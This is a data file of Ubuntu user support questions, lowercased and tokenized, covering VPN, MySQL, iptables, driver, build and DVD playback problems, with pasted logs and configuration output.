431311	ca n't connect vpn pptp on 13.10	so i am having the exact issue as was happening in this question here i have also installed a vpn connection via networkmanager and getting the exact same stack trace . i 've looked at /etc/nsswitch.conf but did not see any wins entries . mine is as follows : passwd : compat group : compat shadow : compat hosts : files mdns4_minimal [ notfound=return ] dns mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis i too am getting : /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... but i have libgcrypt11=1.5.0-3ubuntu3 so not sure if this still has the bug mentioned in 2.2 or if it has been fixed . i noticed that the poster of the other question was able to remove some configs and that made it work but i do not know what configs to remove . wondering if anyone knows or if anyone has fixed this before ? my logs for connection are as follows : mar 8 21:04:27 whoopsie [ 1046 ] : last message repeated 2 times mar 8 21:04:27 aeries networkmanager [ 777 ] : < info > starting vpn service 'pptp ' ... mar 8 21:04:27 aeries networkmanager [ 777 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 17713 mar 8 21:04:27 aeries networkmanager [ 777 ] : < info > vpn service 'pptp ' appeared ; activating connections mar 8 21:04:27 aeries networkmanager [ 777 ] : < info > vpn plugin state changed : init ( 1 ) mar 8 21:04:28 aeries networkmanager [ 777 ] : < info > vpn plugin state changed : starting ( 3 ) mar 8 21:04:28 aeries networkmanager [ 777 ] : < info > vpn connection 'yesvpn ' ( connect ) reply received . mar 8 21:04:28 aeries pppd [ 17717 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . mar 8 21:04:28 aeries pppd [ 17717 ] : pppd 2.4.5 started by root , uid 0 mar 8 21:04:28 aeries pppd [ 17717 ] : using interface ppp0 mar 8 21:04:28 aeries pppd [ 17717 ] : connect : ppp0 < -- > /dev/pts/7 mar 8 21:04:28 aeries pptp [ 17720 ] : nm-pptp-service-17713 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated mar 8 21:04:28 aeries networkmanager [ 777 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) mar 8 21:04:28 aeries networkmanager [ 777 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . mar 8 21:04:28 aeries networkmanager [ 777 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... mar 8 21:04:28 aeries whoopsie [ 1046 ] : online mar 8 21:04:29 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' mar 8 21:04:29 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply mar 8 21:04:29 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . mar 8 21:04:29 aeries whoopsie [ 1046 ] : online mar 8 21:04:30 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' mar 8 21:04:30 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . mar 8 21:04:30 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 45759 ) . mar 8 21:04:59 aeries whoopsie [ 1046 ] : online mar 8 21:05:00 aeries whoopsie [ 1046 ] : online mar 8 21:05:08 aeries networkmanager [ 777 ] : < warn > vpn connection 'yesvpn ' ( ip config get ) timeout exceeded . mar 8 21:05:08 aeries networkmanager [ 777 ] : < info > policy set 'mercury_jj ' ( wlan0 ) as default for ipv4 routing and dns . mar 8 21:05:08 aeries pppd [ 17717 ] : terminating on signal 15 mar 8 21:05:08 aeries pppd [ 17717 ] : connection terminated . mar 8 21:05:08 aeries avahi-daemon [ 576 ] : withdrawing workstation service for ppp0 . mar 8 21:05:08 aeries networkmanager [ 777 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) mar 8 21:05:08 aeries pppd [ 17717 ] : child process /usr/sbin/pptp 174.139.17.123 -- nolaunchpppd -- loglevel 0 -- logstring nm-pptp-service-17713 ( pid 17719 ) terminated with signal 15 mar 8 21:05:08 aeries pppd [ 17717 ] : exit . mar 8 21:05:08 aeries pptp [ 17720 ] : nm-pptp-service-17713 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error mar 8 21:05:08 aeries pptp [ 17720 ] : nm-pptp-service-17713 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log mar 8 21:05:08 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) mar 8 21:05:08 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' mar 8 21:05:08 aeries pptp [ 17733 ] : nm-pptp-service-17713 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) mar 8 21:05:13 aeries networkmanager [ 777 ] : < info > vpn service 'pptp ' disappeared
431312	language set back to english	i installed ubuntu in german . then i installed kubuntu-desktop and set the language back to english . but some components , like the lightdm kde greeter still are in german . how do i set the language to english for all installed programs ?
431314	how much ram memory should i allocate for ubuntu when running a virtual machine ?	how much memory should i allocate to the host os ( in my case , ubuntu 12.04 ) if i run windows 7 ultimate on a virtual machine ( i want it for some gaming ) ? i have 4 gb of ram . if i allocate 3512 mb ram for windows 7 , or if i allocate even more for it , will everything still be ok ?
431316	keyboard not responding during boot when password required	i have installed ubuntu 13.10 with the drive encryption offered by the installer enabled . however when booting my usb keyboard is not responding when i need to enter the password to unlock the drive . neither the usb mouse is responding . what to do to get around this ? if the boot sequence is interrupted at an earlier stage i get the option to configure things , and then the keyboard works . it may be possible the bug https : //bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1238194 is relevant here .
431318	how do i remove multiple files using the terminal	i am using ubuntu 12.04 lts and i want to remove the following files using the terminal : /etc/apt/sources.list.d/google-earth.list.save /home/jatin/google-earth-stable_current_i386.deb /home/jatin/google-earth-stable_current_i386.deb.1 /home/jatin/.cache/software-center/piston-helper/rec.ubuntu.com , api,1.0 , recommend_app , google-earth-stable , ,13c5f00780e1a1b88538de42b80aaada /home/jatin/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , any , any , any , google-earth-stable , page,1 , helpful , ,ea694de2da0c9426e7b795c702d8b1d2 /home/jatin/desktop/debians/google-earth-stable_current_amd64.deb /home/jatin/downloads/google-earth-stable_current_amd64.deb /usr/share/icons/oxygen/128x128/mimetypes/application-vnd-google-earth-kml.png /usr/share/icons/oxygen/16x16/mimetypes/application-vnd-google-earth-kml.png /usr/share/icons/oxygen/22x22/mimetypes/application-vnd-google-earth-kml.png /usr/share/icons/oxygen/32x32/mimetypes/application-vnd-google-earth-kml.png /usr/share/icons/oxygen/48x48/mimetypes/application-vnd-google-earth-kml.png /usr/share/icons/oxygen/64x64/mimetypes/application-vnd-google-earth-kml.png /usr/share/mime/application/vnd.google-earth.kml+xml.xml /usr/share/mime/application/vnd.google-earth.kmz.xml /var/cache/apt/archives/google-earth-stable_6.0.3.2197-r0_amd64.deb and they are scattered in the computer . is there a command to remove them all at once ?
431325	can i install unbutu on its own partition in windows xpmce or xppro with duel boot ?	i have xpmce on a dell xps 400 computer . i also have xppro on another custom computer . i would like to install ubuntu 13.10 desktop on both computers without disturbing my xp os ( alongside ? ) . i have already downloaded and burned 13.10 desktop i386 on a dvd and tried to install it on my dell first as a test but had a problem i think has to do with the partitions ( 2 ) i have on both computers , one for system and the other for data . i think the install was confused by those 2 partitions . first , did i download the right 13.10 version ( i386 ) or should i have downloaded something else . i would like to first create another partition just for ubuntu so as to keep it separate from xp and/or data before i try to install ubuntu and if so how can i do that without confusing the install process ? i simply do n't understand the install language and terms so maybe that 's part of the problem i am having . can anyone make it more clear and easier ?
431330	mysql 5.5 reinstallation 12.04	i had a broken installation of mariadb over mysql 5.5 . for hours i have tried to reinstall mysql with the usage of apt-get - tried to purge , remove etc everything mysql related . uninstalled php aswell . apache got reinstalled too . every single install was throwing errors during mysql-server configuration . i finally managed to perform a succesfull installation from deb package from website . i ran this after the package was installed : sudo apt-get install mysql-server-5.5 installtion failure part : setting up mysql-server-5.5 ( 5.5.35-0ubuntu0.12.04.2 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up libmariadbclient18 ( 10.0.8+maria-1~precise ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : mysql-server-5.5 mysql-server all right , so i ran sudo dpkg -- configure mysql-server-5.5 and got setting up mysql-server-5.5 ( 5.5.35-0ubuntu0.12.04.2 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 if we try to run mysql we get error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) which guides me back to my.cnf manipulation and mysql reinstallation . goddamn closed error circle . i have tried every solution related to mysql installation i have found . really running out of options here , reinstalling and configuring ubuntu would be easier and faster . any feedback appreciated . edit : one notice - why am i prompted for mysql admin password 3 times during an installation ?
431331	install newly developed app on ubuntu touch device	host os : ubuntu 12.04.4 lts ubuntu touch device : nexus4 running ubuntu 13.10 my dev environment is qtcreator with the ubuntu-sdk plugin i 'm trying to deploy the qml / c++ sample app ( the one created by the qtcreator application/qt quick2 application ) on the phone . the phone is connected to the development host via a usb cable i successfully run the command : build- > ubuntu- > build and install application on device on the phone i got the application installed under /opt qtquick-01 ├── bin │ └── qtquick-01 └── qml └── qtquick-01 └── main.qml unfortunately i can not figure out how to run it on the device i tried several stuff , including creating a .desktop file hoping to got an icon and be able to start the app from the phone 's touch interface . maybe i 'm just configuring the .desktop file the wrong way . is there some link you can suggest to understand how to write it properly and where to place it ? from an ssh shell i tried running directly the binary or the qml file ( with qmlscene ) apparently i do not got an error , but i can not see anything on the phone screen . i read online that the app is started `` minimized '' by default and i can maximize it form the app lens , but i can not see it there either .
431334	12.04 update does n't work	i installed my updates/grade today for 12.4 and have been unable to make a successful reboot since . i have had to log on going back to previous upgrade points . do i now have to wait for another update/upgrade for this to be fixed ?
431335	is there a synapse like search bar as a desktop widget for gnome desktop fallback mode ?	i want to add a fixed desktop widget to my gnome fallback desktop . the widget should simply have a search bar and below it , options to search where . i do n't want to hit any key for it to start . it should be like a conky layer . the functionality should be kinda like synapse . but no logo and all . and it should be transparent to seamlessly merge with my desktop background . i searched on this forum and on internet but only found this - how do i add a search function to gnome classic ( fallback ) panel ? . the above question does not help me in anyway . is there any way i can achieve this , preferably using conky . any other method will also be useful .
431338	how to set up iptables for dyndns server ?	i have a server running with a dhcp public ip and ddclient updating my hostname from my public ip whenever it changes . my isp has a feature for dyndns , so my router should automatically map my public ip to my hostname . however , it only works within the lan which tells me that the firewall is wrong . i have forwarded ports 80 and 25565 ( minecraft server port ) in my router config through 192.168.0.8 which is my static lan ip for the server . but i am not sure if my iptables configuration is correct , here are the outputs of : iptables -l chain input ( policy accept ) target prot opt source destination accept all -- anywhere anywhere state related , established accept udp -- anywhere anywhere udp dpt:25565 accept tcp -- anywhere anywhere tcp dpt:25565 accept udp -- anywhere anywhere udp dpt:10000 accept udp -- anywhere anywhere udp dpt : http accept tcp -- anywhere anywhere tcp dpt : http chain forward ( policy accept ) target prot opt source destination accept all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination accept all -- anywhere anywhere iptables -t nat -l chain prerouting ( policy accept ) target prot opt source destination accept all -- anywhere anywhere chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination masquerade all -- anywhere anywhere ifconfig eth0 link encap : ethernet hwaddr 00:0e:7f : a9:10:54 inet addr:192.168.0.8 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20e:7fff : fea9:1054/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:847 errors:0 dropped:0 overruns:0 frame:0 tx packets:797 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:106717 ( 106.7 kb ) tx bytes:282178 ( 282.1 kb ) interrupt:20 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:76 errors:0 dropped:0 overruns:0 frame:0 tx packets:76 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6322 ( 6.3 kb ) tx bytes:6322 ( 6.3 kb ) my external ip is 2.126.189.150 and my hostname is helloworld.dyndns.org for reference my router ip is 192.168.0.1 i have no outfacing interface configured ( no eth1 ) because i have network manager installed
431339	12.04 info message on black screen during boot , wifi works fine	during boot the purple screen vanishes , replaced by a black screen with one line of text [ ] info @ wl_cfg80211_attach registered cfg80211 phy for a few seconds then returns to normal . boot works fine and wifi works fine . this is the 2nd ubuntu install on this netbook . the first time i did n't get this message . i subsequently screwed the system up badly enough that i decided to do a clean re-install , and this message started appearing . everything works , but i really do n't want this message showing up during boot . prior searching for answers to this problem have involved suggestions to remove the wifi driver and install a different one , but in every case , the questioner reported that it did n't work ... however , these questioners also did not have working wifi , and i do . i 'd rather have the message and wifi , but my desired outcome is wifi and no message . any help greatly appreciated .
431342	get the total listening time from the cli with banshee	is there a way i can get total listening time from command line ? i want to write a script to keep track of how much time i spend listening to music on a daily basis .
431343	no internet connectivity when forwarding ppp0 to wlan0	i tried creating hotspot by looking at how to forward an internet connection to another network ? byt my hotspot is creating without an internet connectivity . i have a usb modem & also when i run sudo iptables -t nat -a postrouting -s 10.10.0.0/16 -sudu synaptico ppp0 -j masquerade i 'm receiving below error ; iptables v1.4.12 : multiple -s flags not allowed try `iptables -h ' or 'iptables -- help ' for more information . aside i tried creating hotspot from networks but same the issue is same as it creates without an internet connectivity . please help on this .
431344	lv not showing correct in fdisk	i am working on a project with iscsi to create a iscsi-target and initiator . right now i made a logical volume which looks like this : but when i do fdisk -l it shows : the problem is why does it make a ( - ) between vg0 and sysadmin19 , and where did mapper came from ? hope someone can help me . i am going to make the logical volume accessible from the initiator .
431345	rename files incrementally in a specific directory ?	i have a directory containing bunch of .txt files , i need a command to rename these files by one command , so their name will be : file1.txt , file2.txt , file3.txt , etc . any help ?
431346	multisim on ubuntu 13.10 or gui alternatives for cuircuits measurments	has somebody installed multisim 13 through wine ? how does it work ? buggies ? actually i not necessary need multisim i need simple electric simulator where i can measure volts , amps , ohms with multimeter like in multisim , just to get and to include measurement items in circuit push simulate and i can see measurements . i have installed geda , but here only schematic feature and havent found simulation . i have installed ngspice , but here no gui .
431347	customize gedit color theme as python idle	class player ( ) : my gedit used python idle theme so when i type this piece , 'class ' show orange but 'player' is black . so if i want change classname or function name 's color into blue , what should i do ? i tried to edit the xml file ( the color theme file ) that i downloaded . i added selection color and changed the build-in color but unable to find a way to change the classname and function name . < ! -- global settings -- > < style name= '' text '' foreground= '' black '' background= '' white '' / > < style name= '' cursor '' foreground= '' black '' / > < style name= '' current-line '' background= '' light_grey '' / > < style name= '' line-numbers '' foreground= '' black_grey '' background= '' white '' / > < ! -- constants and variables -- > < style name= '' def : constant '' foreground= '' black '' / > < style name= '' def : string '' foreground= '' green '' / > < style name= '' def : special-char '' foreground= '' maroon '' / > < style name= '' def : special-constant '' foreground= '' purple '' bold= '' true '' / > < style name= '' def : number '' foreground= '' black '' / > < style name= '' def : floating-point '' foreground= '' black '' / > < style name= '' def : keyword '' foreground= '' orange '' / > < style name= '' def : builtin '' foreground= '' purple '' bold= '' true '' / > < style name= '' def : variable '' foreground= '' black '' / > here is the download link
431352	eclipse doesnt start	i installed eclipse and took help with some links and then i linked it with /usr/bin/eclipse but i am getting error that : - bash : /usr/bin/eclipse : permission denied i tried this command ls -l /usr/bin/eclipse and got below given result . lrwxrwxrwx 1 root root 53 mar 8 20:36 /usr/bin/eclipse - > /opt/adt-bundle-linux-x86_64-20131030/eclipse/eclipse so can someone suggest any solution , why eclipse is not running ?
431354	ubuntu in virtualbox : improved performance and shared clipboard without guest additions ?	the performance when running ubuntu in virtualbox is really bad for me without using guest additions . guest additions also help with sharing clipboards . however , with guest additions , virtualbox always crashes when i 'm saving the state of the virtual machine . is there any way to improve performance and to enable shared clipboards , without using guest additions ? or better yet : anything i could do to make it stop crashing ? i have enabled 3d acceleration and increased its memory as well as enabled bi-directional sharing but none of it makes any difference without guest additions . i run virtualbox 4.3.8 with ubuntu 13 guest on a windows 7 ultimate 64 bit host . thanks in advance
431359	how to install kde plazma alongside unity in ubuntu ?	i 'm just not sure how ! please help me to install the kde plazma alongside ubuntu .
431360	how can i get subliminal to work ?	how can i get subliminal to work and then integrate it with a file manager ? i have downloaded subliminal which is a program that downloads movie subtitles.but when i test it at the console with a movie that i know has an english subtitle , i get an unsatisfactory response : alan @ alan-latitude-d530 : ~ $ subliminal -l en la fin du jour.avi usage : subliminal -l language [ language ... ] [ -s ] [ -c cache_file ] [ -p provider [ provider ... ] ] [ -m min_score ] [ -a age ] [ -h ] [ -f ] [ -- addic7ed-username username ] [ -- addic7ed-password password ] [ -q | -v ] [ -- log-file log_file ] [ -- color ] [ -- debug ] [ -- version ] [ -- help ] path [ path ... ] subliminal : error : too few arguments
431365	ubuntu 13.10 ralink rt3290 ?	i know this question has been asked several times , but i have tried almost all the solutions . to begin with , my laptop is a hp envy m-6 that comes with ralink 's rt3290 card.the card works without an issue in windows . ( which i hate working on ) . the solutions that i have tried and not worked for me : i build my own drivers using the proprietary drivers from the mediatech site . as suggested here . they worked well till my kernel was not updated . after the kernel update the drivers did not compiled so i have to edit a few lines and finally i was able to compile . but i often had kernel panic with that and my laptop freezed . then i updated to 13.10 , initially wifi was not working , but after updating the kernel the wifi worked , but it drops every 20-30 minutes . after some experimenting i found that problem occurs whenever i downloaded a large file or watched an hd video . i updated my kernel to 3.12 ( link ) . again no success , i got my wifi connected , but it drops occasionally . the wifi drops more frequently on tls authenticated networks that require username and password for login . i also tried blacklisting conflicting wireless drivers . this was as close as got . am i missing something ? ?
431368	embedding c++ objects into qml with context properties	according to qt5 documentation : exposing methods including qt slots all public slots of c++ classes that inherit from qobject , are accessible from qml here what i did : c++ class myclass : public qobject { q_object public slots : void dostufffromqmlslot ( ) { qdebug ( ) < < q_func_info ; } public : myclass ( ) { qdebug ( ) < < q_func_info ; } } ; my main.cpp contains : myclass myclass ; qqmlengine engine ; engine.rootcontext ( ) - > setcontextproperty ( `` myclass '' , & myclass ) ; qqmlcomponent component ( & engine , qurl : :fromlocalfile ( `` qml/qtquick-01/main.qml '' ) ) ; component.create ( ) ; qml import qtquick 2.0 rectangle { width : 360 height : 360 text { text : qstr ( `` hello world '' ) anchors.centerin : parent } mousearea { anchors.fill : parent onclicked : { myclass.dostufffromqmlslot ( ) ; qt.quit ( ) ; } } } actually the qtcreator seems to recognixe the exposed myclass object into the qml as it enables auto-completion of both class name ( myclass ) and the public slot dostufffromqmlslot ( ) . when i run the application i unfortunately got the following error : referenceerror : myclass is not defined any clue on what i 'm doing wrong ?
431372	what does s permission means ?	while i run ls -l command on /usr/bin/sudo , it shows $ ls -l /usr/bin/sudo -rwsr-xr-x 1 root root 121144 feb 28 2013 /usr/bin/sudo what does the s permission means for this sudo file ?
431374	i want to install cudaminer but compile fails due to libcurl	~/cudaminer/./configure checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes /home/andreas/cudaminer/missing : unknown ` -- is-lightweight ' option try `/home/andreas/cudaminer/missing -- help ' for more information configure : warning : 'missing ' script is too old or missing checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for gcc option to accept iso c99 ... -std=gnu99 checking how to run the c preprocessor ... gcc -std=gnu99 -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking whether gcc -std=gnu99 needs -traditional ... no checking whether gcc -std=gnu99 and cc understand -c and -o together ... yes checking dependency style of gcc -std=gnu99 ... gcc3 checking for ranlib ... ranlib checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking for gcc -std=gnu99 option to support openmp ... -fopenmp checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking sys/endian.h usability ... no checking sys/endian.h presence ... no checking for sys/endian.h ... no checking sys/param.h usability ... yes checking sys/param.h presence ... yes checking for sys/param.h ... yes checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking for sys/sysctl.h ... yes checking whether be32dec is declared ... no checking whether le32dec is declared ... no checking whether be32enc is declared ... no checking whether le32enc is declared ... no checking for size_t ... yes checking for working alloca.h ... yes checking for alloca ... yes checking for getopt_long ... yes checking whether we can compile avx code ... yes checking whether we can compile xop code ... yes checking whether we can compile avx2 code ... yes checking for json_loads in -ljansson ... no checking for pthread_create in -lpthread ... yes checking for ssl_library_init in -lssl ... yes checking for evp_digestfinal_ex in -lcrypto ... yes ./configure : line 6211 : syntax error near unexpected token ` , ' ./configure : line 6211 : `libcurl_check_config ( , 7.15.2 , , ' i tried to install libcurl but i get the following error : ~/cudaminer/sudo apt-get -f install libcurl4-gnutls-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libcurl3-gnutls ( = 7.32.0-1ubuntu1.3 ) but 7.33.0-1ubuntu1~ubuntu13.10.1~ppa1 is to be installed e : unable to correct problems , you have held broken packages . sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . i tried apt-get update and apt-get install -f but no change . can anybody please help ?
431375	list of available ubuntu packages for arm processors ?	is there a list where i can prefilter architecture : arm and all ported packages appear ? up to now i just searched by trial and error , e.g . entered the name of the package ( in packages.ubuntu.com ) i am interested in , and then confirmed that the package is available for the arm-platform or not . but that takes a lot of time for more than a few packages !
431376	inherited 2nd gen ipod nano - can not delete ipod music	i have acquired ( legitimately ) a 2nd gen ipod nano . it is full with music not to my taste . when i open it up in rhythmbox i am unable to delete the existing ipod music .
431377	error while installing packages in ubuntu 12.04	i 'm using ubuntu 12.04.i 'm trying to install packages from my other system to new one , using command sudo apt-get -u dselect-upgrade.i 'm encountered with following error . processing triggers for gnome-menus ... processing triggers for cups ... updating ppd files for cups-filters ... updating ppd files for foomatic-db-compressed-ppds ... updating ppd files for foomatic-db-engine ... updating ppd files for ghostscript-cups ... updating ppd files for openprinting-ppds ... updating ppd files for c2esp ... updating ppd files for foo2zjs ... updating ppd files for gutenprint ... updating ppd files for hpcups ... updating ppd files for hpijs ... updating ppd files for postscript-hp ... updating ppd files for ptouch ... updating ppd files for pxljr ... updating ppd files for sag-gdi ... updating ppd files for splix ... processing triggers for gconf2 ... errors were encountered while processing : /var/cache/apt/archives/libxml2-dev_2.7.8.dfsg-5.1ubuntu4.6_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
431378	when i try to install ubuntu 13.10 my mouse stops working , and i am unable to move the cursor	i had burned ubuntu onto a disc from another computer and attempted to install it . when ubuntu loads it 's almost like all my usb ports were shut down , and because of this neither my keyboard or mouse work . this prevents me from installing the os .
431380	how to install/upgrade r-base to 3.02 ?	i am pretty new to linux . i installed r-base in my ubuntu 12.04 using the software center ( which by default r-2.14 ) . i want to upgrade to/install r 3.02 . how can i do that ? thank you .
431381	start-up situation	recently replaced windows 8 with ubuntu . at start-up i receive the following unlocking the disk/dev/disk/by-uuid/b7bc470f-59f7-47d1-b2a7-230cc562c3 ( sda5_crypt ) enter paraphrase what does it mean ? i have 2 other computers utilizing ubuntu and have never encountered this .
431382	are oem 's retaining synaptics driver for linux ?	on their website , synaptics states that they delivers their linux driver to oem when they buy synaptics product : sgs-l is provided free of charge to synaptics oem/odm partners when ordered with synaptics touchpad and clickpadâ˘ products . http : //www.synaptics.com/en/gesture-suite-linux.php it 's advertised as the same as the windows driver . so should i call lenovo/hp/dell to get my fully working touchpad driver in linux ?
431388	error mounting /mnt/affe26f1-c669-4794-9015-7aff45393795	i get an error message when i booted after changing a mounting option for a partition /mnt/affe26f1-c669-4794-9015-7aff45393795 is not ready or not present i tried with mount errors=remount -ro /dev/sda/mnt/affe26f1-c669-4794-9015-7aff45393795 kindly give a solution
431389	os choice for and old pc , amd anthalon xp 2000+ 32bit with only 256mb of ram	looking at the site with older versions of ubuntu it seems like 64bit on amd chips is the only option . i can upgrade the ram but i am pretty sure i am stuck with a 32bit processor . this pc had windows xp installed but can not reach the update site . just want to try installing ubuntu or some other linux to see if there is some hardware malfunction .
431390	keep getting error message on k3b when trying to burn a dvd video of a movie	when im burning a movie i keep getting this error message i then clicked on show debbuging output and it showed this message devices -- -- -- -- -- -- -- -- -- -- -- - tsstcorp dvd+-rw ts-l632h d400 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-ram , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r , restricted overwrite ] [ % 7 ] k3b : :isoimager -- -- -- -- -- -- -- -- -- -- -- - mkisofs print size result : 0 ( 0 bytes ) system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.8.5 ( 4.8.5 ) qt version : 4.8.1 kernel : 3.2.0-60-generic-pae used versions -- -- -- -- -- -- -- -- -- -- -- - mkisofs : 1.1.11 mkisofs -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage : no such file or directory . failed to open video_ts.ifo /usr/bin/genisoimage : ca n't open vmg info for '/tmp/kde-robert/k3bvideodvd0/ ' . /usr/bin/genisoimage : unable to parse dvd-video structures . /usr/bin/genisoimage : could not find correct 'video_ts ' directory . possible reasons : - video_ts subdirectory was not found on specified location - video_ts has invalid contents mkisofs calculate size command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage -gui -graft-points -print-size -quiet -volid frozen.2013.1080p.bluray.x264.yi -volset -appid k3b the cd kreator ( c ) 1998-2010 sebastian trueg and michal malek -publisher -preparer -sysid linux -volset-size 1 -volset-seqno 1 -sort /tmp/kde-robert/k3bpr5701.tmp -no-cache-inodes -udf -iso-level 1 -path-list /tmp/kde-robert/k3bjw5701.tmp -dvd-video -f /tmp/kde-robert/k3bvideodvd0 i need some help i am using qbittorent to download the movies . i am not using this to make money i am using it for personal watching .
431391	juju ca n't run wordpress on a local machine and agent-state is pending ?	following this instruction and using juju switch local for installing on my laptop as local host , i get the below error when i run juju status , why ? error : container `` onrea-local-machine-1 '' is already create also , agent-state is pending . see here : http : //paste.ubuntu.com/7056689/
431392	how can i watch r.i.p.d . ( dvd ) ?	i would like to watch r.i.p.d . ( a dvd ) . the dvd is not broken , because i can play it on a friends computer on windows 7 . my dvd player is not broken , as i can play other dvds ( also with double layer ) on my computer = > it is not a hardware problem . codecs i 've installed the following codecs : sudo apt-get install ubuntu-restricted-extras sudo apt-get install libdvdread4 libdvdcss2 libdvdcss libdvdnav4 sudo /usr/share/doc/libdvdread4/install-css.sh sudo apt-get install gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg libxine1-ffmpeg gxine mencoder libdvdread4 totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 mpg321 regionset $ regionset /dev/dvd regionset version 0.1 -- reads/sets region code on dvd drives error : could not open disc `` /dev/dvd '' ! please ensure there is a readable cd or dvd in the drive . what i 've tried vlc vlc does n't play the dvd at all : $ vlc vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0xee3048 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . `` sni-qt/3981 '' warn 16:09:18.033 void statusnotifieritemfactory : :connecttosnw ( ) invalid interface to snw_service libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd no such file or directory 